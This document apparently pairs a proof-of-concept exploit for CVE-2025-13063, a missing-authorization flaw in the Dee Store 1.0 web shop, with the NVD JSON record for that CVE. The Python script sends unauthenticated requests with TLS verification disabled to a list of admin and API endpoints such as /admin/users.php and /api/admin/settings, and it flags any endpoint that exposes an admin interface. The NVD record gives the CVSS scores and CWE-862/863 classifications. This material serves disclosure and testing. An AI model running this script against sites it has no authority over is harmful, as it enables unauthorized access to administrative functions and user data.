CVE-2025-13063

# CVE-2025-13063 PoC - Dee Store 1.0 Missing Authorization # Target: DinukaNavaratna Dee Store 1.0 # Vulnerability: Broken Access Control / Missing Authorization import requests import sys def exploit(target_url): """ Exploit CVE-2025-13063: Missing Authorization in Dee Store 1.0 This PoC demonstrates unauthorized access to protected endpoints. """ # Define vulnerable endpoints (identified through enumeration) vulnerable_endpoints = [ "/admin/dashboard.php", "/admin/users.php", "/admin/products.php", "/admin/orders.php", "/api/user/profile", "/api/admin/settings" ] print(f"[*] Target: {target_url}") print(f"[*] Exploiting CVE-2025-13063: Missing Authorization") for endpoint in vulnerable_endpoints: url = target_url.rstrip('/') + endpoint # Send request without authentication headers = { 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64)' } try: response = requests.get(url, headers=headers, timeout=10, verify=False) # Check if access is granted without authorization if response.status_code == 200: print(f"[+] VULNERABLE: {url}") print(f" Status: {response.status_code}") print(f" Length: {len(response.content)} bytes") # Check for sensitive data exposure if 'admin' in response.text.lower() or 'dashboard' in response.text.lower(): print(f" [!] Sensitive admin interface exposed!") elif response.status_code == 403: print(f"[-] Protected: {url}") else: print(f"[?] Unexpected: {url} - Status: {response.status_code}") except requests.exceptions.RequestException as e: print(f"[!] Error accessing {url}: {e}") def main(): if len(sys.argv) < 2: print(f"Usage: python {sys.argv[0]} <target_url>") print(f"Example: python {sys.argv[0]} http://target.com/dee-store") sys.exit(1) target = sys.argv[1] exploit(target) if __name__ == "__main__": main()

{"cve": {"id": "CVE-2025-13063", "sourceIdentifier": "[email protected]", "published": "2025-11-12T21:15:48.950", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "A flaw has been found in DinukaNavaratna Dee Store 1.0. Affected is an unknown function. Executing manipulation can lead to missing authorization. The attack may be performed from remote. The exploit has been published and may be used. Multiple endpoints are affected."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", "baseScore": 7.3, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 3.4}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "baseScore": 7.5, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "NONE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL"}, "baseSeverity": "HIGH", "exploitabilityScore": 10.0, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}, {"lang": "en", "value": "CWE-863"}]}], "references": [{"url": "https://github.com/DinukaNavaratna/Dee_Store-Simple_Online_Shopping_Website/issues/1", "source": "[email protected]"}, {"url": "https://vuldb.com/?ctiid.332189", "source": "[email protected]"}, {"url": "https://vuldb.com/?id.332189", "source": "[email protected]"}, {"url": "https://vuldb.com/?submit.682708", "source": "[email protected]"}]}}